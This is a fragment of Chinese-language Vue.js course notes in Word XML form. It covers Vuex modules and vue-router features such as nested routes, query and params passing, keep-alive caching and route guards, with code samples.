        <w:t>·Person.vue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人员列表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"color:red"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Count组件求和为：{{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列表中第一个人的名字是：{{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firstPersonName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placeholder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"请输入名字"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v-model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addWang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添加一个姓王的人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addPersonServer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添加一个人，名字随机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'nanoid'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computed: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firstPersonName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//从personAbout中找，需要设置命名空间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getters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'personAbout/firstPersonName'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'personAbout/ADD_PERSON'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addWang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'personAbout/addPersonWang'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personObj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addPersonServer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dispatch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'personAbout/addPersonServer'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·count.js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//求和相关的配置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设置命名空间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namespaced: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jiaOdd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'actions中的jiaOdd被调用了'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%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2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jiaWait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'actions中的jiaWait被调用了'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setTimeout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'JIA'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500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+=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JIAN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'mutations中的JIAN被调用了'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//当前的和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school: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'尚硅谷'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subject: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'前端'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bigSum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sum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*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10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·person.js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//人员管理相关的配置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'axios'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}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'nanoid'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设置命名空间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namespaced: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addPersonWang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indexOf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'王'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===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'ADD_PERSON'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'添加的人必须姓王！'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addPersonServer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//https://api.uixsj.cn/hitokoto/get?type=social每次访问都会返回一个字符串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axios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'https://api.uixsj.cn/hitokoto/get?type=social'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then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context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commit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'ADD_PERSON'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nanoid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name:response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error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mutations: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ADD_PERSON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'mutations中的ADD_PERSON被调用了'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unshift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value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'张三'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getters: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firstPersonName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//该文件用于创建Vuex中最为核心的store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'vuex'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引入求和与人员配置的模块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countOptions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'./count'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personOptions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'./person'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//应用Vuex插件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Vuex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使用求和与人员配置的模块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modules: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countAbout:countOptions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personAbout:personOptions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·App.js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'./components/Count'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'./components/Person'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Count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Person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console.log('App',this)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·main.ja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//引入store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'./store'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store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beforeCreate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prototype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$bus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pacing w:after="240"/>
        <w:jc w:val="left"/>
      </w:pP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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路由</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·一个路由（route）就是一组映射关系（key - value），多个路由需要路由器（router）进行管理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·前端路由</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- key是路径，value是组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·后端路由</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- value 是function, 用于处理客户端提交的请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 服务器接收到一个请求时, 根据请求路径找到匹配的函数来处理请求, 返回响应数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·vue-router</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- vue 的一个插件库，专门用来实现SPA 应用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·SPA 应用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 单页Web 应用（single page web application，SPA）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 整个应用只有一个完整的页面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 点击页面中的导航链接不会刷新页面，只会做页面的局部更新</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 数据需要通过ajax 请求获取</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路由基本使用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="1682750"/>
            <wp:effectExtent l="0" t="0" r="1270" b="8890"/>
            <wp:docPr id="10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·安装vue-router模块</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- npm i vue-router</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·应用插件：Vue.use(VueRouter)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·编写router配置项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引入vue-router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'../components/About'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'../components/Home'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//配置每个路由的路径和组件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jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·实现切换（active-class可配置高亮样式）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"/about"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·指定展示位置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722120" cy="2727960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10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·引入bootstrap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2760980"/>
            <wp:effectExtent l="0" t="0" r="4445" b="12700"/>
            <wp:docPr id="1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引入vue-router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'../components/About'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'../components/Home'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//配置每个路由的路径和组件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jc w:val="left"/>
      </w:pP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router:router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//配置路由器router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jc w:val="left"/>
      </w:pP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"row"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"col-xs-offset-2 col-xs-8"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"page-header"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 Router Demo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"row"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"col-xs-2 col-xs-offset-2"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原始html中我们使用a标签实现页面的跳转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&lt;a class="list-group-item active" href="./about.html"&gt;About&lt;/a&gt;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&lt;a class="list-group-item" href="./home.html"&gt;Home&lt;/a&gt;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Vue中借助router-link标签实现路由的切换,to是要切换的路由，active-class定义元素被激活时的样式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"/about"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"col-xs-6"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"panel"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"panel-body"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router-view标签指定组件的呈现位置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/>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·About.vue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我是About的内容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·Home.vue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我是Home的内容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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>几个注意点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·路由组件通常存放在pages文件夹，一般组件通常存放在components文件夹</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·通过切换，“隐藏”了的路由组件，默认是被销毁掉的，需要的时候再去挂载</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·每个组件都有自己的$route属性，里面存储着自己的路由信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·整个应用只有一个router，可以通过组件的$router属性获取到</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>嵌套（多级）路由</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·配置路由规则，使用children配置项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routes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//通过children配置子级路由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//此处一定不要写：/news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//此处一定不要写：/message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]</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·跳转（要写完整路径）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"/home/news"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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2533015"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1206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·目录结构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1623060" cy="2567940"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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//配置一级路由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//配置二级路由，不用加/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·main.js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//引入App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'./App.vue'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//引入VueRouter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//关闭Vue的生产提示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config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productionTip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false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//应用插件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use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//创建vm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el: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'#app'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render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App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router:router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·About.vue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我是About的内容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beforeDestroy()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console.log('About组件即将被销毁了')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mounted()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console.log('About组件挂载完毕了',this)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window.aboutRoute = this.$route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window.aboutRouter = this.$router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·Home.vue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Home组件内容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"nav nav-tabs"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二级路由前要写一级路由的路径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"/home/news"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"/home/message"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beforeDestroy()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console.log('Home组件即将被销毁了')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mounted()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console.log('Home组件挂载完毕了',this)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window.homeRoute = this.$route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window.homeRouter = this.$router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·Message.vue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"/message1"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message001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&amp;nbsp;&amp;nbsp;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"/message2"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message002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&amp;nbsp;&amp;nbsp;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href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"/message/3"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message003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a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&amp;nbsp;&amp;nbsp;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·News.vue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news001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news002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news003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·Banner.vue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"col-xs-offset-2 col-xs-8"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"page-header"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 Router Demo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'Banner'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·App.vue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"row"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Banner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"row"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"col-xs-2 col-xs-offset-2"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原始html中我们使用a标签实现页面的跳转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&lt;a class="list-group-item active" href="./about.html"&gt;About&lt;/a&gt;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&lt;a class="list-group-item" href="./home.html"&gt;Home&lt;/a&gt;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Vue中借助router-link标签实现路由的切换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"/about"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"col-xs-6"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"panel"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"panel-body"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指定组件的呈现位置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Banner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'./components/Banner'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'App'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Banner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jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>路由的query参数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·传递参数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跳转路由并携带query参数，to的字符串写法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&lt;router-link :to="`/home/message/detail?id=${m.id}&amp;title=${m.title}`"&gt;{{m.title}}&lt;/router-link&gt;&amp;nbsp;&amp;nbsp;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跳转路由并携带query参数，to的对象写法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'/home/message/detail'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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·接收参数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- $route.query.id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- $route.query.title</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·要修改的目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1844040" cy="2827020"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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'../pages/Detail'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//一级路由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//二级路由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//三级路由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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Message.vue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跳转路由并携带query参数，to的字符串写法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&lt;router-link :to="`/home/message/detail?id=${m.id}&amp;title=${m.title}`"&gt;{{m.title}}&lt;/router-link&gt;&amp;nbsp;&amp;nbsp;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跳转路由并携带query参数，:to的对象写法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//跳转的路径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'/home/message/detail'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//query传参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展示位置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messageList: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·Detail.vue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消息编号：{{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消息标题：{{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//this.$route.query里面有传过来的参数信息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t>命名路由</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·作用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 可以简化路由的跳转</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·给路由命名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path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'/demo'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component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Demo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children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'test'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//给路由命名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'welcome'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component:Hello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·简化跳转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&lt;!--简化前，需要写完整的路径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"/demo/test/welcome"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跳转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&lt;!--简化后，直接通过名字跳转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跳转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&lt;!--简化写法配合传递参数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跳转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t>路由的params参数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·配置路由，声明接收params参数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path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component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children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'detail/:id/:title'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//使用占位符声明接收params参数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·传递参数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跳转并携带params参数，to的字符串写法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="/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/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你好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跳转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跳转并携带params参数，to的对象写法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666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'你好'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}"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跳转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·特别注意</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 路由携带params参数时，若使用to的对象写法，则不能使用path配置项，必须使用name配置！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·接收参数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- $route.params.id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- $route.params.title</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pP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638300" cy="2583180"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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'../pages/Detail'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'guanyu'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'detail/:id/:title'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/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Message.vue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跳转路由并携带params参数，to的字符串写法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&lt;router-link :to="`/home/message/detail/${m.id}/${m.title}`"&gt;{{m.title}}&lt;/router-link&gt;&amp;nbsp;&amp;nbsp;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跳转路由并携带params参数，to的对象写法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messageList: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·Detail.vue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消息编号：{{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消息标题：{{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console.log(this.$route)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pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>路由的props配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·路由组件更方便的收到参数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name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path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'detail/:id'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8C8C8"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>component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//第一种写法：props值为对象，该对象中所有的key-value的组合最终都会通过props传给Detail组件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props:{a:900}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//第二种写法：props值为布尔值，布尔值为true，则把路由收到的所有params参数通过props传给Detail组件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//第三种写法：props值为函数，该函数返回的对象中每一组key-value都会通过props传给Detail组件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props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/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828800" cy="2354580"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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'../pages/Detail'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'guanyu'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//props的第一种写法，值为对象，该对象中的所有key-value都会以props的形式传给Detail组件。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//用的少，因为把数据写死了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props:{a:1,b:'hello'}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//props的第二种写法，值为布尔值，若布尔值为真，就会把该路由组件收到的所有params参数，以props的形式传给Detail组件。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//只适用params参数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//props的第三种写法，值为函数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props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//解构赋值的连续写法，语义化不明确，不推荐使用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props({query:{id,title}}){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return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id,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title,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a:1,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    b:'hello'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pacing w:after="240"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Detail.vue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template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ul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li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消息编号：{{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id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}}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&lt;/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li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li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消息标题：{{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title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}}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&lt;/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li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&lt;/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ul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&lt;/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template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script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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>export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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>default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name: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'Detail'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props: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[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'id'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,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>'title'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],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hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>computed: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id(){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 return this.$route.query.id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},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title(){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 return this.$route.query.title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},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hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>mounted</w:t>
      </w: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hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>// console.log(this.$route)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宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
        </w:rPr>
      </w:pP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&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体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t>&lt;router-link&gt;的replace属性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·作用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 控制路由跳转时操作浏览器历史记录的模式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·浏览器的历史记录有两种写入方式：分别为push和replace，push是追加历史记录，replace是替换当前记录。路由跳转时候默认为push</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·如何开启replace模式：&lt;router-link replace .......&gt;News&lt;/router-link&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>编程式路由导航</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·不借助&lt;router-link&gt; 实现路由跳转，让路由跳转更加灵活</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·具体编码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//$router的两个API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push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id:xxx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title:xxx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replace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params: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id:xxx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title:xxx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forward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//前进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back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//后退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//可前进也可后退</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·要修改的目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1859280" cy="3101340"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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·Message.vue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v-for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messageList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key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跳转路由并携带params参数，to的字符串写法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&lt;router-link :to="`/home/message/detail/${m.id}/${m.title}`"&gt;{{m.title}}&lt;/router-link&gt;&amp;nbsp;&amp;nbsp;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跳转路由并携带params参数，to的对象写法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pushShow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push查看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replaceShow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replace查看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hr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messageList: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'消息001'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'消息002'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'消息003'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pushShow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push实现路由跳转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push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replaceShow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replace实现路由跳转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replace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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Banner.vue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"col-xs-offset-2 col-xs-8"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"page-header"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Vue Router Demo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back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后退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forward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前进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@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click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测试一下go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button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'Banner'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methods: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back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//后退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back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console.log(this.$router)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forward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//前进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forward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test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//到指定页面，正数向前，负数向后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3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缓存路由组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·让不展示的路由组件保持挂载，不被销毁</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·具体编码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缓存多个路由组件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&lt;keep-alive :include="['News','Message']"&gt;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缓存一个路由组件，指定组件名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keep-alive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include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"News"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keep-alive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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pP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737360" cy="2750820"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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Home组件内容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"nav nav-tabs"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"/home/news"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"list-group-item"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active-class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"active"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"/home/message"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router-link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缓存多个路由组件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&lt;keep-alive :include="['News','Message']"&gt;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&lt;!-- 缓存一个路由组件，指定组件名 --&gt;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keep-alive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include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"News"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router-view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keep-alive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div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beforeDestroy()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console.log('Home组件即将被销毁了')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mounted()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console.log('Home组件挂载完毕了',this)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window.homeRoute = this.$route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window.homeRouter = this.$router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/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>两个新的生命周期钩子</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·路由组件所独有的两个钩子，用于捕获路由组件的激活状态</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·具体名字</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- activated路由组件被激活时触发</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- deactivated路由组件失活时触发</w:t>
      </w:r>
    </w:p>
    <w:p/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767840" cy="2385060"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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: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style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="{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欢迎学习Vue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news001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news002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news003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input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type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"text"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li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ul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data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beforeDestroy()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console.log('News组件即将被销毁了')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clearInterval(this.timer)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mounted(){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this.timer = setInterval(() =&gt;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console.log('@')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this.opacity -= 0.01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if(this.opacity &lt;= 0) this.opacity = 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},16)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activated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'News组件被激活了'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setInterval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'@'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-=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0.01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&lt;=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0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opacity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},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16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deactivated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'News组件失活了'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clearInterval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this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timer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/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路由守卫</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·对路由进行权限控制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·分类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 全局守卫</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 独享守卫</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 组件内守卫</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局路由守卫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486535" cy="2310765"/>
            <wp:effectExtent l="0" t="0" r="6985" b="571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'../pages/Detail'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'guanyu'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//路由元信息，title是页面标题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'关于'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'zhuye'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'主页'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'xinwen'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//路由元信息，isAuth是判断是否需要校验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'新闻'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'xiaoxi'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'详情'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//props的第一种写法，值为对象，该对象中的所有key-value都会以props的形式传给Detail组件。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props:{a:1,b:'hello'}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//props的第二种写法，值为布尔值，若布尔值为真，就会把该路由组件收到的所有params参数，以props的形式传给Detail组件。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//props的第三种写法，值为函数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props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//全局前置路由守卫————初始化的时候被调用、每次路由切换之前被调用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//to是要去的路由，from是当前路由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'前置路由守卫'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//判断是否需要鉴权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//过去localStorage的school值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)===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//放行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'学校名不对，无权限查看！'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//放行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//全局后置路由守卫————初始化的时候被调用、每次路由切换之后被调用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//没有next函数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afterEach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'后置路由守卫'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//路由切换后，设置